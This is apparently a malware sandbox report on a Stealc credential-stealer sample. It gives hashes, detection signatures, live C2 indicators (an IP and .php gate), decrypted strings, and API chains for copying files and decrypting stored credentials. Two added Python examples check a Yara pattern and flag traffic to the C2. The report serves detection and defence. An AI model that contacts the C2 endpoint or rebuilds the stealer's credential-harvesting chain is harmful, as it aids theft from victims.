Windows Analysis Report
XJQkTVvJ3I.exe

Overview

General Information

Sample name: XJQkTVvJ3I.exe (renamed because the original name is a hash value)
Original sample name: 85bb8945ac7b0a1ceeb1f3783168b6ea.exe
Analysis ID: 1546474
MD5: 85bb8945ac7b0a1ceeb1f3783168b6ea
SHA1: c8f62675f94208f80d9ac054963e87583cf01680
SHA256: 78f70275d462340e3f57293641aedd5de6112df4b51c1d9d11d35676260c147c
Tags: exe, Stealc, user-abuse_ch

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • XJQkTVvJ3I.exe (PID: 6588, cmdline: "C:\Users\user\Desktop\XJQkTVvJ3I.exe", MD5: 85BB8945AC7B0A1CEEB1F3783168B6EA)
    • WerFault.exe (PID: 7116, cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6588 -s 1332, MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

Stealc: {"C2 url": "http://185.235.128.16/562c1eb14955c897.php", "Botnet": "LogsDiller"}
Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.1929328076.0000000000840000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.1667894126.0000000002530000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
(3 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.XJQkTVvJ3I.exe.2450e67.2.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0.2.XJQkTVvJ3I.exe.2450e67.2.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0.3.XJQkTVvJ3I.exe.2530000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0.3.XJQkTVvJ3I.exe.2530000.0.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0.2.XJQkTVvJ3I.exe.400000.1.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
(1 further entry not shown)

Sigma Overview

No Sigma rule has matched
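The memory-dump table above records one hit on a community rule, Windows_Trojan_RedLineStealer_ed346e4c, as a hex string at offset 0x778 of the 0x00840000 dump. What follows is an added example and not part of the Joe Sandbox report: a small Python matcher for Yara-style hex strings (fixed bytes plus "??" wildcards) that confirms a reported offset against a dump image. The dump it runs on is constructed for the example, with the pattern planted at 0x778, because the real .sdmp is not on this page. The disassembly in the comment is read straight from the quoted bytes; the point to take from it is that the sequence is a generic function prologue, so a hit on a rule named for a different family should be corroborated with the Stealc-specific rules and the extracted configuration rather than read as a RedLine attribution.

```python
import re
from typing import List, Tuple

# Hex string quoted in the Yara table for $a of Windows_Trojan_RedLineStealer_ed346e4c,
# reported at offset 0x778 of the 0x00840000 dump. Decoded as x86 it is an ordinary
# function prologue plus argument handling:
#   55          push ebp
#   8B EC       mov  ebp, esp
#   8B 45 14    mov  eax, [ebp+0x14]
#   56 / 57     push esi / push edi
#   8B 7D 08    mov  edi, [ebp+0x8]
#   33 F6       xor  esi, esi
#   89 47 0C    mov  [edi+0xC], eax
#   39 75 10    cmp  [ebp+0x10], esi
#   76 15       jbe  +0x15
#   8B          first byte of the next mov
PATTERN_HEX = "55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B"
REPORTED_OFFSET = 0x778


def compile_hex_pattern(text: str) -> "re.Pattern[bytes]":
    """Compile a Yara-style hex string (fixed bytes and '??' wildcards) to a byte regex.

    The body is wrapped in a lookahead so that overlapping hits are all reported.
    """
    parts = []
    for tok in text.split():
        if tok == "??":
            parts.append(b".")
        elif re.fullmatch(r"[0-9A-Fa-f]{2}", tok):
            parts.append(re.escape(bytes([int(tok, 16)])))
        else:
            raise ValueError(f"unsupported hex token: {tok!r}")
    return re.compile(b"(?=(" + b"".join(parts) + b"))", re.DOTALL)


def find_all(buf: bytes, pattern_hex: str) -> List[int]:
    """All offsets in buf at which the hex pattern matches."""
    pat = compile_hex_pattern(pattern_hex)
    return [m.start() for m in pat.finditer(buf)]


def verify_hit(buf: bytes, pattern_hex: str, expected_offset: int) -> Tuple[bool, List[int]]:
    """Check a reported Yara offset against the dump: (offset confirmed?, all hits)."""
    hits = find_all(buf, pattern_hex)
    return expected_offset in hits, hits


def constructed_dump() -> bytes:
    """Constructed stand-in for the .sdmp file: 0xCC filler with the pattern planted at 0x778."""
    needle = bytes(int(t, 16) for t in PATTERN_HEX.split())
    buf = bytearray(b"\xcc" * 0x1000)
    buf[REPORTED_OFFSET:REPORTED_OFFSET + len(needle)] = needle
    return bytes(buf)


if __name__ == "__main__":
    confirmed, hits = verify_hit(constructed_dump(), PATTERN_HEX, REPORTED_OFFSET)
    print("reported offset confirmed:", confirmed, "hits:", [hex(h) for h in hits])
```

To check the real dump, read the .sdmp file into `buf` and call `verify_hit(buf, PATTERN_HEX, 0x778)`; additional hits at other offsets tell you how specific the string really is inside that image.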
Suricata Overview

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-01T00:27:16.904776+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.4 | 49737 | TCP
2024-11-01T00:27:55.791732+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.4 | 49743 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-01T00:27:00.114024+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.235.128.16 | 80 | TCP
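The extracted configuration gives a single C2 host, port and path, and the Suricata row above records the session to it (192.168.2.4:49730 to 185.235.128.16:80). The following is an added example, not from the report: Python that derives IOCs from the extracted configuration and applies them, together with the report's "HTTP GET or POST without a user agent" signature, to HTTP request records of the kind a proxy log or Zeek http.log yields. The records are constructed for the example. Treating a 16-hex-character .php path on a bare-IP host as a generic Stealc gate indicator is an assumption, stated in the code, not something the report asserts.

```python
import json
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Configuration exactly as the sandbox's Malware Configuration Extractor reported it.
STEALC_CONFIG = ('{"C2 url": "http://185.235.128.16/562c1eb14955c897.php", '
                 '"Botnet": "LogsDiller"}')

# Assumption: the gate path shape seen in this sample (16 lowercase hex chars + ".php"
# requested from a bare-IP host) is worth flagging on its own. The report does not say so.
GATE_PATH_RE = re.compile(r"^/[0-9a-f]{16}\.php$")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


@dataclass(frozen=True)
class C2Ioc:
    host: str
    port: int
    path: str
    botnet: str


def iocs_from_config(config_json: str) -> C2Ioc:
    """Turn the extracted config into a concrete host/port/path indicator."""
    cfg = json.loads(config_json)
    u = urlsplit(cfg["C2 url"])
    port = u.port or (443 if u.scheme == "https" else 80)
    return C2Ioc(host=u.hostname, port=port, path=u.path, botnet=cfg.get("Botnet", ""))


@dataclass(frozen=True)
class HttpRecord:
    """One HTTP request as a proxy log or Zeek http.log would summarise it."""
    src: str
    dst: str
    dst_port: int
    method: str
    host: str
    path: str
    user_agent: Optional[str] = None


def classify(rec: HttpRecord, ioc: C2Ioc) -> List[str]:
    """Return every reason the record looks like Stealc traffic (empty list = clean)."""
    reasons: List[str] = []
    if (rec.dst, rec.dst_port, rec.path) == (ioc.host, ioc.port, ioc.path):
        reasons.append("known-c2")               # exact match on the extracted config
    if rec.method in ("GET", "POST") and not rec.user_agent:
        reasons.append("no-user-agent")          # the report's "HTTP GET or POST without a user agent"
    if IPV4_RE.match(rec.host) and GATE_PATH_RE.match(rec.path):
        reasons.append("stealc-like-gate-path")  # assumption-based heuristic, see above
    return reasons


def scan(records: List[HttpRecord], ioc: C2Ioc) -> List[Tuple[HttpRecord, List[str]]]:
    """Pair each suspicious record with its reasons; clean records are dropped."""
    out = []
    for rec in records:
        reasons = classify(rec, ioc)
        if reasons:
            out.append((rec, reasons))
    return out


# Constructed records (not taken from the report's PCAP). The first mirrors the Suricata
# C2 alert: 192.168.2.4:49730 -> 185.235.128.16:80. The other addresses are TEST-NET.
SAMPLE_RECORDS = [
    HttpRecord("192.168.2.4", "185.235.128.16", 80, "POST", "185.235.128.16",
               "/562c1eb14955c897.php", None),
    HttpRecord("192.168.2.4", "203.0.113.5", 443, "GET", "example.com",
               "/index.html", "Mozilla/5.0"),
    HttpRecord("192.168.2.4", "203.0.113.9", 80, "POST", "203.0.113.9",
               "/0123456789abcdef.php", "Mozilla/5.0"),
]

if __name__ == "__main__":
    ioc = iocs_from_config(STEALC_CONFIG)
    for rec, reasons in scan(SAMPLE_RECORDS, ioc):
        print(f"{rec.src} -> {rec.dst}:{rec.dst_port} {rec.method} {rec.path}: {', '.join(reasons)}")
```

The exact-match reason is the only one backed by this report; the two heuristics are there to surface sessions to a rotated gate before the next configuration has been extracted, and should be tuned against your own HTTP baseline before alerting on them.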


                      AV Detection

Source: XJQkTVvJ3I.exe | Avira: detected
Source: 00000000.00000003.1667894126.0000000002530000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://185.235.128.16/562c1eb14955c897.php", "Botnet": "LogsDiller"}
Source: XJQkTVvJ3I.exe | ReversingLabs: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: XJQkTVvJ3I.exe | Joe Sandbox ML: detected
Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpack | String decryptor output, one decrypted string per line (empty results shown as "(empty)"):
  !\%s
  wsws
  RO
  (empty)
  ~~~tuvxyz{|}~
  tuvwx9;9|}@AB
  NOPXYSTUVW\]^4444<<fgh:>>::66pqr TUVWXYSTUVWXYSTUVWXYSTUVWXYSTUVWXYSTUVWXYSTUVWXYSTUVWXYSTUVWXYSTUVWXYSTUVWXYSTUVWXYSTUVWXYSTUVVZZT\\\\TTBFFBBNNrvvrr~~()*xxxxxhh234fbbnnb)qrs'!#!/!2o
  i000000dplmnopqrsijklmnopqrsijklmnopqrsijklmnopqrsijklmnopqrsijklmnopqrsijklmnopqrsijklmnopqrsijklmnopqrsijklmnopqrsijklmnopqrsijklllltttt```````````|||tttNRRVV&NBBFFBB^^BB2Z^^ZZVVJs
  !"#$%&'()*+,-./0123456789:pqrstuvwxyko
  !"#$%&'()*+,-./0123456789:pqrstuvwxyko
  !"#$%&'()*+,-./0123456789:pqrstuvwxyko
  !"#$%&'()*+,-./0123456789:pqrstuvwxyko
  0000000%'%;=?=;%'%>::&&**.ege~zzffjjz
  6*[HACAGACAOAC@
  }567N/
  VLstXJ@soL
  qQJ[De@ugg6NUI
  o/t:9m29
  +,
  'r eres6l
  )ntT.
  0ken
  :XO+42=$4P:0:
  %7OMa+:vi"
  (empty)
  @\MBY_JHMV@FIRBKKHYP@WZTB_OM
  PM
  [UJJKYIRBKKPLH_@
  CYBP
  CHJ]ZB]KICJ]BOK
  MK]TPLH]_TN
  #O1OM
  *.*
  ys\*r*
  =.aged0t\
  .metCdata-v2
  DQexte0E+
  @z[WBRJM|d9
  *
  033(5?09.K
  (
  ^1EGPcodiNGTUQ[64">
  x:P46k
  L0
  2/'2!-!4!#(2/-%n$,,
  tuvwxyz{|}@A<tuvz{|}@ABt
  JKLMNOXYZ[`abcde<<444<44nopqrsZ[\]^WXYZ[\]^WXYZ[\]^WXYZ[\]^WXYZ[\]^WXYZ[\]^WXYZ[\]^WXYZ[\]^WXYZ[\]^WXYZ[\]^WXXRRVVRZVVLLDDDvzz$%&'()pppppxhh234567bbf-/%+-uvwxyk5
  defghijklmnrsqrsqrsqrsqrsqrsqrsqrsqrsqrsrvv```!"#$TTT()*+,-./012BFF6789:pqrstuyko
  !"#$%&'()*+,-./0123456789:pqrstuvwxyko
  !"#$%&'()*+,-./0123456789:pqrstuvwxyko
  !"#$%&'()*+,-./0123456789:pqrstuvwxyko
  *..9;90000000000?=#%'%#-/-acagacaoacJM
  _HEGEKMODLL]X
  dTEDOVYK
  e
  ~~~tuvxyz{|}~
  t575;=?=;5IJK@AB
  OPQRSWXYZ[\Z[\]<abcde<<4ijklm44,qrsZ[\Z[\Z[\Z[\Z[\Z[\Z[\Z[\Z[\Z[\Z[\Z[\Z[\Z[\Z[\Z[\Z[\\\TTTLLLD!"#~~z'()*+vvr/0123nnj789:p+)/tuvwx#03
  defghijklmnrsqrsqrsqrsqrsqrsqrsqrsqrsqrsrvv```!"#$TTT()*+,-./012BFF6789:pqrstuyko
  !"#$%&'()*+,-./0123456789:pqrstuvwxyko
  !"#$%&'()*+,-./0123456789:pqrstuvwxyko
  !"#$%&'()*+,-./0123456789:pqrstuvwxyko
  !"#$%&'()*+,-./0123456789:pqrstuvwxyko
  .226622>>226}sqwqsqqbe
  acagacaoacJMcdefJEDGFAmnB]qr~~uvGIKI89+/
  '
  '
  ' '
  (empty)
  ' '
  g_XBX
  ~tuvwxyz~~z{|}~
  ?9EFGHIJK
  OPQRSXYZ[\[\]^_::>>defgh3171mnopq((\]Z[\]Z[\]Z[\]Z[\]Z[\]Z[\]Z[\]Z[\]Z[\]Z[\]Z[\]Z[\]Z[\]Z[\][Y_YPPPPIOIK!xxxx&'()*qwqs/0123nnjj89:pq((((vwxyk5
  hijrsmnopqrsmnopqrsmnopqrsmnopqrsmnopqrsmnopqrsmnopqrsmnopqrsmnopqrsmnopqrsmnopqrsmnopqrsmnopqrsmnnrrvvddd||||~zzffjj!"NJJVVZZ*+,@@@@@@@456ZVVJstu
  !"#$%&'()*+,-./0123456789:pqrstuvwxyko
  !"#$%&'()*+,-./0123456789:pqrstuvwxyko
  !"#$%&'()*+,-./0123456789:pqrstuvwxyko
  !"#$%&'()*+,-./0123456789:pqrstuvwxyko
  !"#$%&'()*+,-./0123456789:pqrstuvwxyko
  "&&""..""&&"">>""&&"88*.WY[Y_Y[YWIZ]
  wxyz0*00+31189+/
  NN
  (empty)
  Td,dLP=1/$v
  Q7<
  voRIMZNdi
  *wm
  apwdz=i9M
  @z
  u
  m `NUO1
  zqNZM5J
  _ur~
  tm`~]z
  eeAN8PD
  n
  :hmwLf{$"#q2qj7|
  b4~$ieo7`bV7XCt
  ccir62Z//+
  OImh(
  j
  4UMLl}s
  GetDeviceCaps
  DNMQr
  <`cp
  '%1k[ki{(
  is
  )?3X#J;$9
  3ti\{~
  s`6ga{a0c
  \FB[{nentrb
  nY42
  Y13.B
  GL?/|dmFUv1A$
  S39s;
  Otxre
  5rpFlykuavWsxY$%
  ys5rt!X"jK
  INN5z
  hm)e1r
  {`WXTO!mnr8|oNF93
  nk3F$pgVG
  bZ$<#
  GetLocalTime
  qdBr}z
  vlor
  nbdhQisp1
  OEWMy1AecMZB
  tyO
  ]R
  ;8w.ncf6?*
  2First
  r
  GetModuleFileNameA
  DeleteFilEp
  FindNextFileE
  g/{ga9JH
  =o1s(7ki)>:~]
  (empty)
  .Q*
  ointer
  EUHl~
  Y~_
  }r
  YDG4=g|0{is`Rfht7
  %.*+o-&O
  rror
  lWTo
  WideCharToMultiBy\e
  v|Pj`~Q|
  l
  ^`
  /jtf
  lKj
  9>
  psapi.dll
  1vD}|
  \E.4*;pT
  hkwnw
  7xyk
  NAX
  ra
  kgRrK
  !xaqR.~Ji}FI]Y OXW
  4H2Q7U@
  7Ud-smFpm
  x_Vk&\zQ3REb3
  Foh
  =\0
  ts`nu`9SHhRh
  khba
  v~enx
  i
  xU'db9d;m
  w`d{bseicbq}qgoz
  U569$GNR
  TrSzq?vvReRe
  |2ZtwG
  H**f*~3
  cLtsO
  TCMORYutbHkX4J
  \
  uT9fLc{p dos|1
  GCDy=fm
  s}o|HBDow
  4aTv
  yA(v
  u.z}*4JY
  4zf-|hcjS
  r
  w5Lru
  jY1YX vntYOG
  gxjKgfn.mW
  OUjpL
  l<payj
  {>-+
  gF7GJN{`uC
  Gp`~UwhG
  +sl
  O9E&woV
  Z=X;$4
  ?BUQ3L
  'J{
  T3[.}tY
  Scb4
  $x-Ded|
  w
  JqXwL
  sqlite3_prepare_v2
  eez7^~lp
  d{g~
  aovb9^`rfp
  {s
  efwEc{zzlO~
  h-,sq!mW
  n9Z,
  aQY!_EkfN_
  y
  QC4Ig
  HATKOngp
  unyt"b
  eSlot
  M&_1Y,wI
  r
  #u
  n@fc"
  sxgmoal`hsv`xcb`}|{nj
  $I!~z
  v}~upa1Hy/Vo%l@Q?cschF2c)`uw
  hnd1M/}b;8
  jYJay|`tD
  ;r1d
  kos"Q
  3[?S]y
  k`~~||uyxbpxq{xybvtqk`p}~e`vwbyfue}s|c
  unx}plhkboahg`~cqzza~p{}elctco`xz
  sxvbwfyaegmzw
  `obd3HFzydB
  ty
  qA6Jd#'w{]x:MVHHArlZ4}joS3:QFJ,
  FM0jcc
  Jvd4mOc)b^my0tPfnZuEd
  ];-1
  WF8Hdp87
  z|
  `il}hgl`ye
  A6HBG0UR
  2ZIT0LFh10_t,?+0Q>!</
  l>
  a}{c
  9S_1J
  @W(C'2
  v`qacizxw~{ii`|a|o`g
  jyee{lqpz~}edlxjsavz
  rTT9HB\PTnfp=h9^?
  ~jGknQCC+?bfYKUSK|65j{sW^,A8X-Pa{NP`
  )xd@z?Xt/ICq9AeV,cc|PyFI7093|qK~:]kh
  \N=d8m;!a]9hNI'$jbt0
  ko RUPEvcNz%`ky
  qoj
  ygRDVg
  son
  ?7QGv
  3 z7
  encryptedUsername
  encryptedPassword
  m
  uaeeudsnuqku}
  {b~je`ju{ac
  `e
  RY59+
  }y~n} |Du>Du>F$UAnKWw9M}v>GrZXp"IYDhl?V
  'm20 )a|hO+mcp,8gks?]
  P
  m`k
  xx
  `{
  #}kw{[trGTqy`xrB3VD`|
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: !`]axpqjz
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: @UOR
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ,$A^fiT(:)#
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: is`L9pB
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: l!!Hs
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: e9drlZheAbj9z}h
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: kuxxuhd
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: em Summary:
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: gtc0M3g!
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 2D -%
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: aG
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: UZ8+.&j60D
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: qoc]U
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: yl
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: tfT)
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ~QY
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: FQIV}g|rq
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: nS="V=
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: l|ho/Eq
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: JU6Bt"CL
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: T6YX
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: G{csgPDl
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: r
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: Q2WCCK43
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: T2YT
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ~S"tqrvgd*ij
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ksUV4u=DjAP
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 8vNs
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: kwQ8f@5{O{
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: yyviQPI
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: akns
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 9?7~"dS^=
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ]Rf(1J
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: open
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: D49,hUBY
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: pj{O
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ~{gtCv{dhxA
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ea#MMH6-
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: FILES%
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_00419030 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0040C920 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0040A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_004072A0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0040A2B0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_02469297 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0245A477 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_02457507 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0245A517 CryptUnprotectData,LocalAlloc,memcpy,LocalFree
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0245CB87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat

Compliance

Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Unpacked PE file: 0.2.XJQkTVvJ3I.exe.400000.1.unpack
Source: XJQkTVvJ3I.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Binary string: my_library.pdbU source: XJQkTVvJ3I.exe, 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000003.1667894126.0000000002530000.00000004.00001000.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: my_library.pdb source: XJQkTVvJ3I.exe, XJQkTVvJ3I.exe, 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000003.1667894126.0000000002530000.00000004.00001000.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,LCMapStringW,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
